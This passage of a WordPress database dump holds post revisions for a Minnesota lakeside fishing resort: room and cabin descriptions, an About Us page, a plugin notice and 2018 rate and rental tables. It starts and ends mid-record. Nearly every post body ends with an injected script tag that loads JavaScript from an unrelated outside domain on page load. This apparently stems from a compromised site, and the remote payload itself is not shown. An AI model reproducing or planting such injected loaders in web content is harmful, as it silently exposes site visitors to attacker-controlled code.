http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:32:54','2018-03-10 03:32:54','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(647,1,'2018-03-09 21:37:57','2018-03-10 03:37:57','<p><strong> Stay in a Motel Room – </strong><strong><a href=\"http://ashbyresort.com/calendar/\">Call us at 218-747-2959 to book it</a>  <br /></strong></p><p><strong>All motel rooms are available nightly, weekly and long term.</strong></p><p><strong>We have motel units with kitchens “Kitchenettes”<br /> and we have units without kitchens “Sleepers”.<br />or our Lakeside Villa.<br /></strong></p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.</p>		\n		<img src=\"http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg\" title=\"Motel\" alt=\"Motel\" />		\n		<p><strong>Kitchenettes #1, 3, 5 &amp; 7</strong></p><p>Are 1 bedroom – 1 bathroom with 2 double beds Maximum people 4</p><p>also included in a Kitchenette unit is:<br /> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4149-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Sleepers #2, #4 and #6</strong></p><p>Are one bedroom – 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br /> Maximum people 4.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<p><strong>Lakeside Villa #9</strong></p><p>Unit # 9 is one of the most popular units newly remodeled in 2015<br /> #9 has one Queen bed, and two single beds one bathroom<br />Maximum people 4. No pets. No Smoking.</p>		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />		\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-03-09 21:37:57','2018-03-10 03:37:57','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(656,1,'2018-03-09 21:57:53','2018-03-10 03:57:53','<p>Our <a href=\"http://ashbyresort.com/motel/\">Motel</a>, <a href=\"http://ashbyresort.com/cabins/\">Cabins</a> and <a href=\"http://ashbyresort.com/large-cabins/\">New Cabins</a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\"http://ashbyresort.com/campgrounds/\">Tent and RV camping sites</a> available.</p>[caption id=\"attachment_302\" align=\"alignnone\" width=\"300\"]<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Motel-300x225.jpg\" width=\"300\" height=\"225\" /> MOTEL KITCHENETTES &amp; SLEEPERS[/caption][caption id=\"attachment_287\" align=\"alignnone\" width=\"300\"]<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008-300x225.jpg\" width=\"300\" height=\"225\" /> CABINS[/caption][caption id=\"attachment_354\" align=\"alignnone\" width=\"300\"]<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg\" width=\"300\" height=\"225\" /> NEWER CABINS[/caption][caption id=\"attachment_253\" align=\"alignnone\" width=\"300\"]<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-300x225.jpg\" width=\"300\" height=\"225\" /> CAMPING[/caption]<p>Our <a href=\"http://ashbyresort.com/motel/\">Motel</a>, <a href=\"http://ashbyresort.com/cabins/\">Cabins</a> and <a href=\"http://ashbyresort.com/large-cabins/\">New Cabins</a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\"http://ashbyresort.com/campgrounds/\">Tent and RV camping sites</a> available.</p>		\n					<figure>\n						<a href=\"http://ashbyresort.com/motel/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>MOTEL KITCHENETTES & SLEEPERS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/cabins/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />				</a>\n						<figcaption>CABINS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/large-cabins/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>NEWER CABINS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/campgrounds/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>CAMPING</figcaption>\n					</figure><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Lodging','','inherit','closed','closed','','37-revision-v1','','','2018-03-09 21:57:53','2018-03-10 03:57:53','',37,'http://ashbyresort.com/37-revision-v1/',0,'revision','',0),(657,1,'2018-03-09 21:58:05','2018-03-10 03:58:05','<p>Our <a href=\"http://ashbyresort.com/motel/\">Motel</a>, <a href=\"http://ashbyresort.com/cabins/\">Cabins</a> and <a href=\"http://ashbyresort.com/large-cabins/\">New Cabins</a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\"http://ashbyresort.com/campgrounds/\">Tent and RV camping sites</a> available.</p>		\n					<figure>\n						<a href=\"http://ashbyresort.com/motel/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>MOTEL KITCHENETTES & SLEEPERS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/cabins/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-008-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />				</a>\n						<figcaption>CABINS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/large-cabins/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>NEWER CABINS</figcaption>\n					</figure>\n					<figure>\n						<a href=\"http://ashbyresort.com/campgrounds/\" data-elementor-open-lightbox=\"default\">\n		<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />				</a>\n						<figcaption>CAMPING</figcaption>\n					</figure><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Lodging','','inherit','closed','closed','','37-revision-v1','','','2018-03-09 21:58:05','2018-03-10 03:58:05','',37,'http://ashbyresort.com/37-revision-v1/',0,'revision','',0),(658,1,'2018-03-09 22:11:53','2018-03-10 04:11:53','<strong>IF YOUR LOOKING FOR A VACATION DREAM.\r\nWE HAVE YOUR DREAM VACATION.</strong>\r\nAshby Resort is located in Grant County, Minnesota. On beautiful Pelican Lake a 4,000 acre lake just off highway 94 midway between Alexandria and Fergus Falls.\r\nAshby Resort is a family owned fishing resort with owner\'s Diane and Mike Bovee to help you continue a timeless Minnesota fishing tradition.\r\nApproximately 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} of our customer\'s return to the resort each year and many have done it for several generations.\r\nThe Resort is nestled on 11 acres of land and has something for everyone. The ultimate location for your family\'s reunion, five Cabins seven Motel rooms both with and without Kitchens a newly remodeled lakeside villa and sixteen lakeside/view campsites for your camper or tent.\r\nGently sloping sandy beach/swim area\r\nFREE WIFI\r\nEnclosed clean fish cleaning facilities.\r\nTHE BEST hand scooped ICECREAM cones ever.\r\n\r\n[custom-facebook-feed]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','About Us','','inherit','closed','closed','','12-revision-v1','','','2018-03-09 22:11:53','2018-03-10 04:11:53','',12,'http://ashbyresort.com/12-revision-v1/',0,'revision','',0),(659,1,'2018-03-31 13:07:53','0000-00-00 00:00:00','<p>\n<strong>Help us improve WPForms</strong><br />\nWe&#8217;re celebrating WPForms&#8217; 2nd birthday. Since the launch of WPForms two years ago, it is now being used by over 900,000 websites. As we plan for the next three years, we need your feedback &#8211; it&#8217;ll take less than 90 seconds.\n</p>\n<p><a href=\"https://wpforms.com/wpforms-nps-survey-2018/?utm_source=wpdashboard&#038;utm_medium=amnotification&#038;utm_campaign=npssurvey\" target=\"_blank\" class=\"button button-primary\">Share your feedback and help improve WPForms &raquo;</a> <a href=\"https://wpforms.com/wpforms-turns-2-years-old-whats-new-whats-coming-next/?utm_source=wpdashboard&#038;utm_medium=amnotification&#038;utm_campaign=npssurvey\" class=\"button button-secondary\" target=\"_blank\">Read our Annual Recap to See What&#8217;s New in WPForms</a></p>\n<p>Thanks as always for your continuous support of WPForms!<br />\nSyed Balkhi<br />\nFounder of WPForms<br />\nP.S. there&#8217;s a limited time 30% off coupon at the end of the survey :)</p>\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','','','draft','closed','closed','','','','','2018-03-31 13:07:53','0000-00-00 00:00:00','',0,'http://ashbyresort.com/?post_type=amn_wpforms-lite&p=659',0,'amn_wpforms-lite','',0),(668,1,'2018-03-31 21:22:09','2018-04-01 02:22:09','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 21:22:09','2018-04-01 02:22:09','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(669,1,'2018-03-31 21:33:46','2018-04-01 02:33:46','Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\r\nWireless Internet Available\r\n2018 Rates\r\n2018	Bedrooms	Weekday Nightly	Weekend Holiday Nightly	Weekly Sept. – May	Weekly June – Aug.	Maximum Capacity	\r\nSleepers Motel	1	$80.00	$95.00	$450.00	$550.00	4	\r\nKitchenettes Motel	1	$100.00	$130.00	$600.00	$700.00	4	\r\nSuite 9	2	$175.00	$225.00	$900.00	$1,100.00	4	\r\nCabins (#10 #11 #12)	2	$180.00	$230.00	$900.00	$1,100.00	8	\r\nCabins (#13 #14)	2	$200.00	$250.00	$1,000.00	$1,200.00	8	\r\nTent & Popups	1 per site	$35.00	$35.00	$180.00	$180.00		\r\nRV/Travel Trailers	1  per site	$45.00	$45.00	$250.00	$250.00		\r\nPets		$5.00	$5.00	$35.00	$35.00		\r\nAdditional People Camping (Each)		$5.00	$5.00	$25.00	$25.00		\r\nAdditional People in Motel and Cabins (Each)		$20.00	$20.00	$100.00	$100.00		\r\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\r\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\r\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\r\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\r\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\r\n \r\n\r\nEquipment Rentals\r\nIf Available	Daily	Weekly	\r\n14\' Lund Boat	$20.00	$100.00	\r\n15 H.P. 4 Stroke Yamaha Motor	$30.00	$150.00	Plus Gas\r\nBoat and Motor	$50.00	$250.00	Plus Gas\r\n			\r\n20\' Pontoon with 25 H.P. Motor	$125.00	$450.00	Plus Gas\r\nPaddle Boards	$5.00 per hour		\r\nBoat Lifts	$20.00	$100.00	\r\nBoat Launching/Docking			$5.00 One time Fee\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 21:33:46','2018-04-01 02:33:46','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(670,1,'2018-03-31 21:34:32','2018-04-01 02:34:32','<div id=\"pl-670\"  class=\"panel-layout\" ><div id=\"pg-670-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-670-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-670-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018	Bedrooms	Weekday Nightly	Weekend Holiday Nightly	Weekly Sept. – May	Weekly June – Aug.	Maximum Capacity	\nSleepers Motel	1	$80.00	$95.00	$450.00	$550.00	4	\nKitchenettes Motel	1	$100.00	$130.00	$600.00	$700.00	4	\nSuite 9	2	$175.00	$225.00	$900.00	$1,100.00	4	\nCabins (#10 #11 #12)	2	$180.00	$230.00	$900.00	$1,100.00	8	\nCabins (#13 #14)	2	$200.00	$250.00	$1,000.00	$1,200.00	8	\nTent & Popups	1 per site	$35.00	$35.00	$180.00	$180.00		\nRV/Travel Trailers	1  per site	$45.00	$45.00	$250.00	$250.00		\nPets		$5.00	$5.00	$35.00	$35.00		\nAdditional People Camping (Each)		$5.00	$5.00	$25.00	$25.00		\nAdditional People in Motel and Cabins (Each)		$20.00	$20.00	$100.00	$100.00		\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available	Daily	Weekly	\n14\' Lund Boat	$20.00	$100.00	\n15 H.P. 4 Stroke Yamaha Motor	$30.00	$150.00	Plus Gas\nBoat and Motor	$50.00	$250.00	Plus Gas\n			\n20\' Pontoon with 25 H.P. Motor	$125.00	$450.00	Plus Gas\nPaddle Boards	$5.00 per hour		\nBoat Lifts	$20.00	$100.00	\nBoat Launching/Docking			$5.00 One time Fee\n\n</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 21:34:33','2018-04-01 02:34:33','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(671,1,'2018-03-31 21:34:34','2018-04-01 02:34:34','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018	Bedrooms	Weekday Nightly	Weekend Holiday Nightly	Weekly Sept. – May	Weekly June – Aug.	Maximum Capacity	\nSleepers Motel	1	$80.00	$95.00	$450.00	$550.00	4	\nKitchenettes Motel	1	$100.00	$130.00	$600.00	$700.00	4	\nSuite 9	2	$175.00	$225.00	$900.00	$1,100.00	4	\nCabins (#10 #11 #12)	2	$180.00	$230.00	$900.00	$1,100.00	8	\nCabins (#13 #14)	2	$200.00	$250.00	$1,000.00	$1,200.00	8	\nTent & Popups	1 per site	$35.00	$35.00	$180.00	$180.00		\nRV/Travel Trailers	1  per site	$45.00	$45.00	$250.00	$250.00		\nPets		$5.00	$5.00	$35.00	$35.00		\nAdditional People Camping (Each)		$5.00	$5.00	$25.00	$25.00		\nAdditional People in Motel and Cabins (Each)		$20.00	$20.00	$100.00	$100.00		\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available	Daily	Weekly	\n14\' Lund Boat	$20.00	$100.00	\n15 H.P. 4 Stroke Yamaha Motor	$30.00	$150.00	Plus Gas\nBoat and Motor	$50.00	$250.00	Plus Gas\n			\n20\' Pontoon with 25 H.P. Motor	$125.00	$450.00	Plus Gas\nPaddle Boards	$5.00 per hour		\nBoat Lifts	$20.00	$100.00	\nBoat Launching/Docking			$5.00 One time Fee\n\n</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 21:34:34','2018-04-01 02:34:34','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(672,1,'2018-03-31 21:49:43','2018-04-01 02:49:43','Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\r\nWireless Internet Available\r\n2018 Rates\r\n2018\r\nBedrooms\r\nWeekday Nightly\r\nWeekend Holiday Nightly\r\nWeekly Sept. – May\r\nWeekly June – Aug.\r\nMaximum Capacity\r\n\r\nSleepers Motel\r\n1\r\n$80.00\r\n$95.00\r\n$450.00\r\n$550.00\r\n4\r\nKitchenettes Motel\r\n1\r\n$100.00\r\n$130.00\r\n$600.00\r\n$700.00\r\n4\r\nSuite 9\r\n2\r\n$175.00\r\n$225.00\r\n$900.00\r\n$1,100.00\r\n4\r\nCabins (#10 #11 #12)\r\n2\r\n$180.00\r\n$230.00\r\n$900.00\r\n$1,100.00\r\n8\r\nCabins (#13 #14)\r\n2\r\n$200.00\r\n$250.00\r\n$1,000.00\r\n$1,200.00\r\n8\r\nTent & Popups\r\n1 per site\r\n$35.00\r\n$35.00\r\n$180.00\r\n$180.00\r\n\r\nRV/Travel Trailers\r\n1  per site\r\n$45.00\r\n$45.00\r\n$250.00\r\n$250.00\r\n\r\n\r\nPets\r\n\r\n$5.00\r\n$5.00\r\n$35.00\r\n$35.00\r\n\r\n\r\nAdditional People Camping (Each)\r\n\r\n$5.00\r\n$5.00\r\n$25.00\r\n$25.00\r\n\r\n\r\nAdditional People in Motel and Cabins (Each)\r\n\r\n$20.00\r\n$20.00\r\n$100.00\r\n$100.00\r\n\r\n\r\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\r\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\r\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\r\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\r\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\r\n \r\n\r\nEquipment Rentals\r\nIf Available\r\nDaily\r\nWeekly\r\n\r\n14\' Lund Boat\r\n$20.00\r\n$100.00\r\n\r\n15 H.P. 4 Stroke Yamaha Motor\r\n$30.00\r\n$150.00\r\nPlus Gas\r\nBoat and Motor\r\n$50.00\r\n$250.00\r\nPlus Gas\r\n\r\n20\' Pontoon with 25 H.P. Motor\r\n$125.00\r\n$450.00\r\nPlus Gas\r\nPaddle Boards\r\n$5.00 per hour\r\nBoat Lifts\r\n$20.00\r\n$100.00\r\n\r\nBoat Launching/Docking\r\n\r\n\r\n$5.00 One time Fee\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2018-03-31 21:49:43','2018-04-01 02:49:43','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(679,1,'2018-03-31 22:39:34','2018-04-01 03:39:34','[[\"2020\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$90.\",\"$100.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes 